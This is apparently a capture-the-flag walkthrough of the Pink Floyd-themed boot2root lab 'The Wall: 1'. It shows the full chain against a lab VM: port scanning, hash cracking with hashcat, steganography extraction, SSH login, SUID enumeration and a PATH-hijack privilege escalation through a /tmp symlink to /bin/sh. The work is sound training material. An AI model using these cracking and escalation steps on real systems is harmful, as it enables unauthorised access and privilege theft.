“In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!“ – Xerubus
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.130/24)
Target: The Wall: 1 (10.1.1.148/24)
Vulnerability & Exploit
hidden information reveal
Image steganography exploit
moss code decode
local priv escape by sticky bit
Method
Scanned the network to discover the target server [arp-scan]
Sniffing local LAN for any suspicious traffic [wireshark]
Multiple times port scan the target to discover running services and open ports [masscan && nmap]
Reveal hidden information from source codes and images [steghide]
Crack found hashes and login to SSH on target machine [hashcat]
Enumeration and exploit the vulnerable files which set the sticky bit to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using arp-scan as routine to detect the target’s IP address (10.1.1.148 in this case).
12345678910
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.148 00:0c:29:31:6b:24 VMware, Inc.
10.1.1.254 00:50:56:f5:74:35 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 3.314 seconds (77.25 hosts/sec). 4 responded
10.1.1.148 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
However, this time nothing has been found. It sounds like they are behind ‘the Wall’…:`(
Well, it is wierd for a machine with no ports open, so I decided to have a monitor on local LAN to see if the target machine has any suspicious network traffic.
Here it is! Looks like the target machine is looking for tcp port 1337, so I setup nc to listen on port 1337 and then got the following information:
root@kali:~# nc -lvvnp 1337
listening on [any]1337 ...
connect to [10.1.1.130] from (UNKNOWN)[10.1.1.148] 43892
.u!"` .x*"` ..+"NP .z"" ? M#` 9 , , 9 M d! ,8P' R X.:x' R' , F F' M R.d' d P @ E` , ss P ' P N.d' x '' ' X x . 9 .f ! . $b 4; $k / dH $f 'X ;$$ z . MR :$ R M$$, : d9b M' tM M: #'$L ;' M `8 X MR `$;t' $F # X ,oR t Q; $$@ R$ H :RP' $b X @' 9$E @Bd' $' ?X ; W `M' `$M d$ `E ;.o* :R .. ` ' "' ' @' '$o*"' The Wall by @xerubus -= Welcome to the Machine =-If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
sent 0, rcvd 1066 : Connection reset by peer
However, the connection has been automatically closed as soon as we receive the above information. After being stuck for a while, I decided to re-run the ports scan again. Surprisingly, this time TCP port 80 open!
1234567
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 04:55:02 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 80/tcp on 10.1.1.148
By checking the source code of web page, I found the interesting HEX strings at the bottom: 737465673d3333313135373330646262623337306663626539373230666536333265633035
12345678910111213
<html><bodybgcolor="#000000"><center><imgsrc="pink_floyd.jpg"</img></center></body></html><!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork. 737465673d3333313135373330646262623337306663626539373230666536333265633035-->
After HEX decoding, we got steg=33115730dbbb370fcbe9720fe632ec05, the first thing in my mind when I saw the keyword steg is steganography, some information hidden in the image file. so far, the only image file downloaded from the web page is pink_floyd.jpg.
Then I firstly run steghide with password 33115730dbbb370fcbe9720fe632ec05 but could not extract anything… so I guess this is a MD5 hash, then I use hashcat with dictionary rockyou to crack it and found the password: divisionbell.
1234567891011121314151617181920
...truncate...
Added hashes from file stegkey.txt: 1(1 salts)Activating quick-digest mode for single-hash
NOTE: press enter for status-screen
33115730dbbb370fcbe9720fe632ec05:divisionbell <-- here is the cracked password!
All hashes have been recovered
Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)Index.....: 1/5 (segment), 3627099(words), 33550339(bytes)Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 31.00M words
Progress..: 2063664/3627099 (56.90%)Running...: --:--:--:--
Estimated.: --:--:--:--
Started: Sun Dec 6 00:12:55 2015
Stopped: Sun Dec 6 00:13:08 2015
Then use the new cracked password to extract hidden information from the image file:
12345678910111213141516
root@kali:~/the_wall# steghide --extract -p divisionbell -sf pink_floyd.jpg
wrote extracted data to "pink_floyd_syd.txt".
root@kali:~/the_wall# cat pink_floyd_syd.txt
Hey Syd,
I hear you're full of dust and guitars?
If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0
Roger
Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.
root@kali:~/the_wall#
From the email file, we noticed that there is a key U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0, we can see there are two parts separated by |, first one is base64 encoded and the second one is a MD5 hash.
After cracked the string, we got the first part is SydBarrett and the second part is pinkfloydrocks. This must be a login credential, but the question is where to use it?!
Here I did couple of trails against to the web application but all failed (tried nikto, dirbuster and etc)… Then I guess there might be some new ports open just like what has happened on port 80, so I re-run the port scan once again.
Woooo, I am right! new port 1965 discovered by masscan!
12345678
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 05:30:16 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 80/tcp on 10.1.1.148
Discovered open port 1965/tcp on 10.1.1.148
Then I run nmap to do a further scan for these two ports.
12345678910111213
# Nmap 6.49BETA5 scan initiated Sun Dec 6 00:32:59 2015 as: nmap -v -sV -O -A -p80,1965 -oN 10.1.1.148_nmap.txt 10.1.1.148Nmap scan report for 10.1.1.148
Host is up (0.00069s latency).
PORT STATE SERVICE VERSION
80/tcp open http OpenBSD httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open ssh OpenSSH 7.0 (protocol 2.0)| ssh-hostkey:
|2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)|_ 256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)... truncate ...
From the scanning result, we know that 1965 is running SSH.
Then go SSH login on port 1965 with SydBarrett as username and pinkfloydrocks as password, but… failed… which the reasons is This service allows sftp connections only.. T.T
123456789
root@kali:~/the_wall# ssh SydBarrett@10.1.1.148 -p1965
The authenticity of host '[10.1.1.148]:1965 ([10.1.1.148]:1965)' can't be established.ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '[10.1.1.148]:1965' (ECDSA) to the list of known hosts.SydBarrett@10.1.1.148's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 10.1.1.148 closed.
root@kali:~/the_wall# ssh RogerWaters@10.1.1.148 -p 1965
RogerWaters@10.1.1.148's password: OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015 .u!"` .x*"` ..+"NP .z"" ? M#` 9 , , 9 M d! ,8P' R X.:x' R' ,
F F' M R.d' d P @ E` ,
ss P ' P N.d' x ''' X x . 9 .f ! . $b 4; $k / dH $f 'X ;$$ z . MR :$ R M$$, : d9b M' tM M: #'$L;' M `8 X MR `$;t'$F# X ,oR t Q;$$@ R$ H :RP' $b X @' 9$E @Bd' $' ?X ; W
`M' `$M d$ `E ;.o* :R .. ` '"' ' @' '$o*"'$ id
uid=1002(RogerWaters)gid=1002(RogerWaters)groups=1002(RogerWaters)$ pwd/home/RogerWaters
$
Now we are in, next step should be go upper to escape privilege.
After enumeration the file system, I found the following information.
123456789
$ ls -al /home
total 28
drwxr-xr-x 7 root wheel 512 Oct 24 17:36 .
drwxr-xr-x 13 root wheel 512 Oct 24 18:03 ..
drwx------ 4 DavidGilmour DavidGilmour 512 Oct 28 09:28 DavidGilmour
drwx------ 3 NickMason NickMason 512 Aug 8 00:33 NickMason
drwx------ 3 RichardWright RichardWright 512 Nov 27 02:02 RichardWright
drwx------ 3 RogerWaters RogerWaters 512 Oct 28 09:29 RogerWaters
drwxr-xr-x 4 root SydBarrett 512 Oct 24 18:03 SydBarrett
Looks like there are 5 users in the system and we have already got 2, so more like we need to escape to others before get ROOT.
Then we try to find files which set the sticky bit under those three users, and we found:
12345678
$ find / -perm -u=s -type f -user DavidGilmour 2>/dev/null
/usr/local/bin/shineon
$ find / -perm -g=s -type f -user NickMason 2>/dev/null
/usr/local/bin/brick
$ ls -al /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon
$ ls -al /usr/local/bin/brick
-rws--s--x 1 NickMason NickMason 7291 Aug 8 00:33 /usr/local/bin/brick
Cool!! Any one can run the file /usr/local/bin/brick and it has sticky bit set!
Run it and give the correct answer (which should not be a problem if you familiar with Pink Floyd), so I am now Nick Mason!
123456789101112131415161718192021
$ /usr/local/bin/brick
What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason)gid=1001(NickMason)groups=1002(RogerWaters)$ whoami
NickMason
$
By checking NickMason’s home folder, nothing interesting but another jpg file, I downloaded it to my Kali and try to open it but it is not a JPEG file… it is an Ogg audio file!
12345
root@kali:~/the_wall# display nick_mason_profile_pic.jpg
display: Not a JPEG file: starts with 0x4f 0x67 `nick_mason_profile_pic.jpg' @ error/jpeg.c/JPEGErrorHandler/322.
root@kali:~/the_wall# file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
root@kali:~/the_wall#
Open and listen it carefully, there is moss code playing in the background. after run some audio analyze tools to curve the morse code out (more details please check Arr0way’s walkthrough):
Crack the morse code online and we got the plaintext which is RICHARDWRIGHT1943FARFISA. So now we got a new login credential: username is RichardWright and password is 1943farfisa.
Right, now I can su to Richard successfully!
1234567
$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright)gid=1003(RichardWright)groups=1003(RichardWright)$ whoami
RichardWright
Now let’s back to the other sticky file /usr/local/bin/shineon which is can be run by RichardWright
12
$ ls -al /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon
After run the program, we know that it call system commands such as ping and mail etc… Let’s check if there is basic coding error we can exploit to priv escape.
Run strings to check the binary file and found it call the command mail without specifying the absolute path.
123456789101112131415161718
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
Now, It’s time to move to David!
First, create a symbolic link of /bin/sh to the global writable directory /tmp and name it as mail, then overriding the environment variable $PATH.
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ id
uid=1003(RichardWright)euid=1004(DavidGilmour)gid=1003(RichardWright)groups=1003(RichardWright)$ pwdmail: pwd: can't get current directory - Permission denied
$ whoami
DavidGilmour
$ cd /home/DavidGilmour
$ ls -alh
total 408
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 DavidGilmour DavidGilmour 87B Oct 24 17:36 .Xdefaults
-rw-r--r-- 1 DavidGilmour DavidGilmour 773B Oct 24 17:36 .cshrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 103B Oct 24 17:36 .cvsrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 398B Oct 24 17:36 .login
-rw-r--r-- 1 DavidGilmour DavidGilmour 175B Oct 24 17:36 .mailrc
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 26 11:44 .private
-rw-r--r-- 1 DavidGilmour DavidGilmour 218B Oct 24 17:36 .profile
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 28 05:16 .ssh
-rw------- 1 DavidGilmour DavidGilmour 384B Aug 8 00:33 anotherbrick.txt
-rw-r--r-- 1 DavidGilmour DavidGilmour 1022B Oct 26 08:59 bio.txt
-rwxr----- 1 DavidGilmour DavidGilmour 178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r-- 1 DavidGilmour DavidGilmour 785B Oct 27 01:43 mbox
In order to get full priviledge of use DavidGilmour, I did some enumeration and there is a jpg file in David’s home directory. By checking the jpg file david_gilmour_profile_pic.jpg with strings, I found the password on the bottom: who_are_you_and_who_am_i.
After some enumeration, I found new clues in the file anotherbrick.txt
1234567
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy DiamondNew website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php
# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs $
Checking the new web page, this is the home page of 50 years of Pink Floyd.
After some testing with the new web page, could not find any attacking point, so I downloaded the picture and have a close look.
There are something hidden in it, by increasing the brightness of the picture, the hidden strings become more and more clearly.
From the picture, we got a folder or a path /welcometothemachine and a key 50696e6b466c6f796435305965617273.
By searching the keyword welcometothemachine, I found a sticky file which is owned by root!
12345678
$ find / -name 'welcometothemachine' 2>/dev/null
/var/www/htdocs/welcometothemachine
$ ls -al /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x 2 root welcometothemachine 512 Aug 8 00:33 .
drwxr-x--- 4 www welcometothemachine 512 Nov 27 01:47 ..
-rws--s--- 1 root welcometothemachine 7513 Nov 27 01:47 PinkFloyd
$
After run the file PinkFloyd and input the answer 50696e6b466c6f796435305965617273
123456789
$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273
Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless
Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
$
Notice the sentence: Congratulations... permission has been granted. by checking the sudo file, we are now can run any command as any users including ROOT!
1234567
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"User DavidGilmour may run the following commands on thewall:
(ALL) SETENV: ALL